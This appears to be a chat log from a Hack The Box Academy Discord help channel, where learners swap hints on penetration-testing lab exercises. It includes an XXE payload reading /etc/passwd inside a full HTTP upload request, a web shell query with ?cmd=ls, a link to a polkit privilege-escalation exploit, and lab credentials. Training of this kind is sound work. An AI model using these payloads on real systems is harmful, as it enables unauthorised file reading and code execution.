i cant link my htb with my new discord

i deleted my old discord

Wrong channel mate

and its still attached to that

well which channel should i post it in?

as every other channel is closed

You can reach out via #1024429874246590575

3 modules (and redoing Linux Priv Escalation) to go! Wheeeee! (and no please don't release another module before I've finished!)

hey does anyone have a recommendation on which modules to start and in which order i should learn them.

Injection Attacks is a cool module. You will have a lot of fun with it

Start with the path Information Security Foundations

are there different using crackmapexec from binaries and crackmapexec with python environment ?

Dm me if need help

@acoustic owl tank you

My next module in fact. Although I need to rebuild reputation with the wife faction first.

Hi, ask something with double hop kerberos. how if we got an initial shell as user who the computer is joined to some domain. but the klist in your reverse shell is 0, and you didnt know about the user password cause you got in from reverse shell. also you are not administrator and not possible to escalate privilege, is that still possible to enumerate the active directory from that siatuation?

you can do credentialed enum if i remember correctly

you mean enumerating credential stored in local?

that has nothing to do with getting or not a kerberos ticket

if you have local admin you can do it

i meant asking DC things

the case is you are not local admin part

then u need to priv esc

not possible too

dead end

then

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberos-double-hop-problem

🤔 hi, having issues with the 2nd question on intro to metasploit,

Which version of Metasploit is free and can be used only through a CLI?

im fairly confident my answer is correct but its not accepting it 😦 (tried a few variations)

what have u tried?

metasploit framework
Metasploit Framework
framework
Framework

try msfconsole

that is accepted but i dont believe thats the correct answer to the question / the correct questionfor that answer

if the question was "what is the command to run the free vesion of metasploit" then i would have given that first try :p

oh well, thanks for the answer :p

np

my guess is that the "through the cli" is why it's msfconsole instead of metasploit framwork

msf = metasploit framework
console = cli

so that's likely what they were going with.

the whole module talks about the 2 versions being "Metasploit Framework" and "Metasploit Pro" though

Metasploit as a product is split into two versions. The Metasploit Pro version is different from the Metasploit Framework one with some additional features

https://academy.hackthebox.com/storage/modules/39/S02_SS01.png

well yes but they did say "through the CLI"

also module answers arent always from the actual module itself, unlike THM.

They'll sometimes ask you to literally google the answer.

thats fine, but the module gives the names for the 2 versions and a comparison between them, q1 asks which version has a gui, q2 asks which one is only usable with cli

its not that it required additional research beyond what the module contained, the module names the 2 versions several times and explains the differences between them, but then those names that were used are only correct for the first question

Yeah I agree. That answer annoyed me.

Can anyone help me with Intro to Assembly Language first skill assesment I'm hard stuck on it.
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
At first I tryed writing my own code to decode it, but all the shellcodes that I got did not work. Then I decided to google a bit and found the code to do it on the HTB forums that should work, but after many attempts I still have seemingly gotten no closer. I can list all of the shellcodes that I have tryed so far if it would be any help. So if anyone has any hint or ideas of what I could be doing wrong I would appreciate it.

Hi everyone! I'm currently in the AD module in the attacking domain trust ... from windows section. I've tried to connect in RDP with the new credentials but every time it says "wrong credentials". I've tried putting the domain inlanefreight.local before the user but that doesn't work either. Can anyone think of a way to fix this? It's holding me back. Thanks in advance.

Ok in found a solution, ty

Thank you for your response, I see now what they were looking for. It's worded really bad in my opinion. For example, it says answer format is [key] + [key] + [key] which is only 3. So if are going to say what the format is, it should say [key] + [key] + [key] + [key]. I would also disagree that shift , part of the shift % should be separate "flags" because the only way to get a % is to hit the shift button, that should be implied. I'm just ranting a bit, when it comes down to some of the non standard flags like the HTB{} tends to be a bit more picky.

File transfers -> Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.

C:\Users\htb-student\Desktop>hasher upload_win.txt
8990089e402b00f809810659fefb5523

But the answer is incorrect. Any hints?

You might have downloaded the wrong file

used https://academy.hackthebox.com/storage/modules/24/upload_win.zip

Did u unzip the file?

i for the life of me cant find the RDP username on the windows priv esc module - Further Credential theft

yes, followed all the steps and got that what i posted.

I got a different hash myself

Gonna retake the steps then!

It's weird. I'm guessing you are hashing the zip itself and not the file inside the zip

I downloaded with wget, from some of my notes, sometimes a download from wget gets the original file while a browser download modifies metadata of the original file

Or maybe some problems during the upload, check with md5 hashes to see if the files it's the same

I've downloaded via wget, powershell and web and used the web version! Will try it again. Thanks for the help guys.

I had a similar problem with b64 encoding, but was a mistake from my own

yeah, happens quite often

idk if you solved this by now, I managed to solve in a unclean way, but I did get a solution. You can dm me what you have so far and I'll try to remember what I did

monged it and didnt realise I need to change who I was logged in as lol

yeah i'm having the same issue

Can I get some help on the AD Emumeration and Attacks skills assessment part 2?

Hello im stuck at the footprint hard module i have obtained the private ssh key but i dont know how can i convert it to a public key i have tried to vim it as id_rsa and chmod 600 but when i try to convert it i get bad permissions.

why are you trying to convert it?

Because when i try to ssh it wants the public key

yo

are you putting it in the right folder as id_rsa?

Yes I've saved it the desktop folder .ssh and from there im trying to connect

I haven't done the footprinting module, but let's get this straight

• A list of valid public keys for a user is stored in /home/$USER/.ssh/authorized_keys
• The private key's permissions need to be 600, doesn't really matter where you store it
• It is possible to get the public key from the private key, can't remember the command off the top of my head but it's very easy to google

Okay i will try but does it matter how i save the private key with what text editor and with what format ?

i think you misunderstood the error code

so are trying to login as the ||tom|| user via ssh? or have try already logged in and are trying to do something else?

Yes im trying to log as tom to ssh

and do to have the that user ||key||?

I found the private key in the imap with ||Tom's|| credentials

Im stuck in the imap of this module! Every fetch command gives me an error any help is aprreciated

you may want to put spoiler tag on the name and you can just chmd 600 the key and login

which module and section are you on?

Fingerprinting module hard lab @vital adder im having trouble grabbing the emails within the imap server

give this a try https://donsutherland.org/crib/imap

Hello everyone
I'm in module "Dynamic Port Forwarding with SSH and SOCKS Tunneling"

I'm getting stuck on this question "Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop."

First, I have Enabling Dynamic Port Forwarding with SSH. and try using xfreerdp with Proxychains "proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123" but it's show error
[23:35:48:859] [957966:957976] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[23:35:48:872] [957966:957966] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

I also try using rdesktop with Proxychains but it's username or password is not correct. "proxychains rdesktop -u victor -p pass@123 172.16.5.19"

I have try to restart the lab several times and still have the same issue.

Do I miss something?

did you change the port in the config file? also try to scan port 3389 with nmap just to confirm that you have access to the target machine through the proxy

Yes config file already configed
└─$ tail -4 /etc/proxychains4.conf

socks4 127.0.0.1 9050
and nmap scan is reachable to target 172.16.5.19.

from the xfreerdp error it's look like a timeout issue try adding this to your rdp command /timeout:80000

wow great, it's solved now.
Thank you

on windows priv esc any hints as to what share the .scf needs to go in for it to be activated

only getting my user

Figure out what shares/folders are writable by the user they give you

only one of them is

lol cheers got it, wasmucking about in the network share

@vital adder when i fetch all it shoes a bunch or irrelevant info jothing really to see. I must be missing something

hint it's not fetch all

Thanks!

Love u rn

Linux Priv Polkit

try to compile on an older version of glibc

or you could use this one written in Go: https://github.com/An00bRektn/CVE-2021-4034

HELP: how can i open these urls in the browser?

they are not being found on the server eventhough i were able to upload them

So weird. I had forgotten i compiled it on my system first. When i first attempted to run it. I waited to compile on the target and it worked with no issues. 🙂

glibc 2.34 added some stuff that isn't exactly backwards compatible, so the target machine is probably running on something before it

also found these, but if i open them in the browser they only show the picture and no web shell

https://academy.hackthebox.com/module/136/section/1289

Just because you get a response code of 200 does not mean the file upload was successful

If the request uploaded, you would see it in the upload folder

Reread the section again, it gives you everything you need to do to bypass the filter

nobody said that xd

i see it was being uploaded in the response

i see it in the upload folder but acnt acces them

as \ changes to / once i open it in the browser

and these are accessible, just not as a shell but as a picture like this:

have you tried passing a parameter to the file anyway to see what happens?

yes

/profile_images/shell:.phtm.jpg?cmd=ls

hey guys, need help in "SQLMap Essentials" module

https://academy.hackthebox.com/module/58/section/526

What's the contents of table flag5? (Case #5)

The contents of table flag5 are not retrieved

tried '--no-cast' switch well

that didnt work too

Hellos

Then that might mean that the reverse double extension isn't working

if it ends in jpg, the server will process it as a jpg

I thought I had the solution in my notes but apparently I forgot to copy the name so I could be wrong, but that's what it looks like from what you've shown

show command

can you send link of target so i can try?

but likely testdb is the issue

83.136.251.221:44882

case5

http://83.136.251.221:44882/case5.php?id=1

working for me

same command?

mostly

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

oh ty

start-here

:(

why didnt work

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

oh

worked yay

All you gotta do is click the link and it tells you

ty

guys

No

Before you ask any additional questions I will refer you to #welcome and #rules

tysm

hey, I'm stuck on Footprinting lab - Medium. I'm not sure how to get into the SQL Management Studio. I've got on through remmina with alex.

Local authentication, and you may need to explore the files to find an important document. That document also has the password for another (always present) Windows account

explore the tech support .txts?

I uesed grep to search for pass*

Nope

There's a file somewhere that contains the login

Just explore all files a* has access to

I believe it's titled "important"

Or something like that

I have faced the same problem in that section and in other sections where you need to compile a .c file, I moved the .c file to victim's machine and compiled there, and it works just fine

@fathom pendant found it! thank you, I struggle to think to do things I didn't already do in previous exercises

anyone got that ever before?

did you import Burp certificate info your browser ?

just re-added it, working thanks!

https://academy.hackthebox.com/module/136/section/1310
found the vulnerability and able to execute code via svg file

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg>&xxe;</svg>

but how can i access the root directory

tried almost every combination xd

most sense for **flag found at the root directory "/". **would be:

<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>```

i think you should remove one slash

just like that file://flag.txt

sadly nothing :/

Host: 83.136.254.230:42616
Content-Length: 307
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfI5exmeUcKa6H2Me
Origin: http://83.136.254.230:42616
Referer: http://83.136.254.230:42616/contact/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryfI5exmeUcKa6H2Me
Content-Disposition: form-data; name="uploadFile"; filename="HTB.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file://flag.txt"> ]>
<svg>&xxe;</svg>

------WebKitFormBoundaryfI5exmeUcKa6H2Me--

you can try yourself if you want

but file:// returns the svg tags

did you read the config file ??

or index file ?

wdym?

also took a look at /etc/mtab

kinda whack to not be able to see the directory but just only a file directly

enjoyed that threat hunting module..i think i like elastic over splunk...not sure

They've both got positives and negatives. I think Elastic feels a lot nicer, and is a bit more intuitive.

yea, i like the way you filter on Elastic vs Splunk

the drill down, certainly

Footprinting lab - Medium. I can't figure out the syntax for MSSQL management studio. In query show doesn't work as a command. I've looked through microsoft's info but I'm not figuring it out.

You can look elsewhere without querying the database to find the login info…

i believe accounts is the name of the database, for the select statement u will need the name of the table

@umbral wigeon Thank you, I found 200 names and passwords but those are devaccs? None are HTB. where can i lean cli enumiration for this? I see other people have gotten stuck in the GUI before

use a WHERE clause

https://academy.hackthebox.com/module/33/section/191

THANK YOU! got it with the where clause

You can

You can't use "fu" you have to use 'fu' (for the next person)

I am stuck 😭

I tried for a few hours.. can anyone help whaat I am doing wrong here? https://academy.hackthebox.com/module/112/section/1079

I mounted the NFS share, and was able to cd into as root. All I see are a bunch of ticket43243214321.txt files when I use the ls -a command. Nothing happens what I try to cat them.

Getting a permission denied(publickey) error when trying the EASY footprinting lab.

They gave the creds in the lab brief, why is this not working?

hey, I just did that lab and I am on the Medium one lol

When you do ls -la you'll notice that most are blank

Because the ssh service is set up to only accept the rsa key

So check other services

That's literally what that message means

am I allowed to post a screenshot?

guys i need help i found vuln 500 http error because of his HTTP GET request, if i put symbol on parameters it turns to http 500, how do i get the database with sql map?

Yes

Do ls -la

i cant post screenshot 😦

Not just -a

no way

like how am I gonna do this ????

it worked

What's a good resource to research this issue further

Correct, read #rules and #welcome : short answer is your account here is not linked to the app.hackthebox.com account

Your issue is you need to find the rsa_id key

sorry i thought i can talk about ilegal, mb

It's not an error, nor broken

I think I have it with nmap

I figured by your comment

I don't want to post it

You don't. You can't get it via nmap.

You have to enumerate and leverage another running service to obtain the key

I have the ssh-hostkey

Thats not the same

and the ssh-rsa

I cant believe thats all it was

Look at all running services. You will use the login credentials given to sign into one

😭

The -l parameter gives it in a list format

If you want to take it a step further so you can unmount from the nfs share you can copy the ticket to your local machine @elfin cedar

Hello,
Can somebody remind me in which section we get wley's password in the active directory module?

Nope rerun any of the windows ones and you'll be able to find it. In future always save passwords/logins. If you haven't done the password attacks module: same concept. Always log credentials

(In reality I can't be bothered to find it, iirc during one of the hash grabbing ones I just took ALL the user hashed and bruted

I dont remember which one was the intentional wley account one

Tried FTP

not showing anything

now I'm stuck

ahem add -la

I should start charging people for helping them

that's all I got

@novel matrix completely hypothetically

Check all running ports

already did 22, ssh wouldn't accept creds

Use. Nmap

There's a reason I'm suggesting checking all running ports. How can you be so sure that you checked them all, if you don't check for them

yeah 2121?

lol

that got my hopes up, but no

I'll let it click

What service could be running on it

Take my previous advice

That is literally all I'm willing to tell you at this point

Because it's really that simple

And you have this process a lot easier than I did, I had to find [or use the previous hint] the username and password. You're flat out given it and told to hunt for the footprints

didn't work

Extended might be messing with it